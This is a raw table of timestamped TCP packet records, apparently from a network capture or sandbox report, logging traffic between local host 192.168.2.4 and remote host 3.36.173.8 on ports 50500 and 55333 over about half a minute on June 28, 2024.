Jun 28, 2024 19:53:22.292531967 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292587042 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292591095 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292615891 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292640924 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292666912 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292669058 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292695999 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292712927 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292747974 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292749882 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292779922 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292813063 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292825937 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292830944 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292860985 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292886019 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292912006 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292918921 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292941093 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292973042 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292989969 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292992115 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.293021917 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.293045998 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.293072939 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.293075085 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.293104887 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.293133020 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.293140888 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.293164968 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.293186903 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.295135021 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.295193911 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.295398951 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.295456886 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.295501947 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.295531034 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.295562029 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.295563936 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.295589924 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.295593977 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.295618057 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.295645952 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296015978 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296080112 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296142101 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296170950 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296195984 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296227932 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296227932 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296257019 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296308994 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296322107 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296339989 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296367884 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296369076 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296389103 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296396971 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296427011 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296427011 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296448946 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296459913 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296485901 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296521902 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296542883 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296571970 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296592951 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296601057 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296623945 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296633005 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.296646118 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.296683073 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298038006 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298067093 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298119068 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298130989 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298147917 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298181057 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298197031 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298245907 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298274994 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298341990 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298409939 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298547983 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298566103 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298604965 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298629999 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298691034 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298700094 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298728943 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298755884 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298779011 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298784971 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298826933 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298845053 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298873901 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298923969 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298935890 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.298952103 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.298985004 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299002886 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299011946 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299035072 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299061060 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299087048 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299091101 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299118996 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299140930 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299146891 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299180984 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299200058 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299201965 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299232960 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299261093 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299263000 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299276114 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299292088 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299319983 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299346924 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299369097 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299375057 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299388885 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299427986 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299428940 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299457073 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299483061 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299485922 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299498081 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299515963 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299549103 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299549103 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299578905 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299592018 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299607038 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299609900 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299637079 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299638033 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299665928 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299673080 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299694061 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299717903 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299722910 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299751997 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299772024 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299781084 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299809933 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299839020 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299868107 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299871922 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299896955 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299899101 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299921036 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299927950 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299951077 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299959898 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.299983978 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.299989939 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300014973 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300019979 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300040007 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300050020 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300076008 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300076962 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300096035 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300106049 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300128937 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300134897 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300159931 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300163031 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300184011 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300192118 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300211906 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300220966 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300250053 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300250053 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300276041 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300281048 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300299883 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300311089 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300327063 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300343037 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300367117 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300371885 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300403118 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300431013 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300450087 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300457954 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300518036 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300519943 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300550938 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300580025 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300607920 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300612926 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300631046 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300637960 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300657034 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300668001 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300690889 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300698042 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300721884 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300726891 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300740004 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300756931 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300785065 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300786018 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300812960 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300817013 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300829887 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300843000 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300865889 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300870895 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300895929 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300899982 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300920963 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300929070 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300956011 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300957918 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.300971985 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.300986052 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301012993 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301043034 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301048040 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301071882 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301073074 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301100016 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301105022 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301122904 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301129103 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301152945 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301158905 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301182985 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301192045 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301225901 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301240921 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301254034 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301282883 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301310062 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301337957 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301345110 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301362038 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301367044 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301395893 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301395893 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301415920 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301424980 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301446915 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301454067 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301481962 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301481962 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301495075 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301512003 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301539898 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301541090 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301568985 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301569939 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301583052 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301599026 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301621914 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301625967 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301650047 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301656008 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301678896 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301686049 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301711082 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301713943 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301733017 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301743031 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301769018 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301769972 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301785946 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301799059 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301830053 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301851034 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301851034 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301881075 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301904917 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301909924 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301929951 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301939964 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301966906 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.301968098 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301984072 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.301995993 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.302011013 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.302025080 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.302057028 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.302093029 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.302107096 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.345215082 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.346273899 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.367392063 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.922808886 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.928241014 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:29.447900057 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:29.500909090 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:46.132358074 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:46.132839918 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:46.137933016 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.485307932 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:52.490334988 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.866167068 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.881709099 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.881748915 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.881768942 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882018089 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:52.882287025 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882340908 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882375956 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882410049 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882445097 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882464886 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:52.882553101 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:52.882700920 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882755995 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882778883 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:52.882791996 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882826090 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882859945 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:52.882865906 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:52.882960081 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.090060949 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090101004 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090223074 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090255976 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090289116 CEST	50500	55333	3.36.173.8	192.168.2.4
